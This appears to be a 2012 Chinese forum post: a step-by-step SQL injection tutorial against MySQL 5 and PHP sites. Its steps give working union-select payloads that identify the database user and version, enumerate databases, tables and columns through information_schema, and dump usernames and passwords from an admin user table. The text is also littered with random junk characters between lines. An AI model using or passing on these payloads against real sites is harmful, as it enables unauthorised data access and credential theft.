4 i3 @ `: m3 C$ j, y8 K* a
教程内容:Mysql 5+php 注入+ w5 D- x6 O4 O# a
A% z4 @3 `+ L& m' S8 a+ y
# W0 ?9 K: r, s2 B9 ^0 @* {5 c' N) R* v3 S! J
一.查看MYSQL基本信息(库名,版本,用户)( q$ k* B: W3 m9 m9 K1 w9 j) `/ D- p- |
) X: ^. ~) `, q) @. cand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
5 e- O$ e6 P. w; V% u% ~( C# S" S* u
二.查数据库, m* x3 m" |7 i. c' |$ V
( \+ W$ C" g. ?: b
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
- d. a' @. X1 ~3 b2 Hlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。6 n0 w( c# e8 f
: U% C! H% c( L9 x2 o5 k三.暴表
6 `( i+ ?: Q Z& a
* ]7 m4 ^; i% A4 O: _* _" uand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*8 i& ]" z P2 d9 S8 c8 m
1 i9 l. [ Q/ H: L ^& w
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。* Y" | e9 e/ s, [) }
. i! ^/ V" _& n+ r. x+ Y. @- D6 _. M2 X
四.暴字段
+ {; `, M2 h6 k; i) X q0 h4 r, ]6 {% e! `
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
. {" E0 Q3 t: {% d0 K& f- M7 P) Q T# D0 @6 p( G
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
6 B9 m& u9 [- c* h1 L1 q: v
. B+ e6 ` @7 z, S: F; U/ @. Q+ e$ ^五.暴数据
9 z7 j& u0 O. b4 e2 k$ {) g0 H, z0 ` t+ z4 f% F2 f
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*( {3 E5 a" g/ R3 X6 Z) V! K& H4 n
5 n8 P8 h9 U) ?3 L5 q; p K! h
. p1 d4 P( [7 g9 Y这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。0 F& ]. W# N/ V0 {
|
发表于 2012-9-13 16:27:53
收藏
支持
反对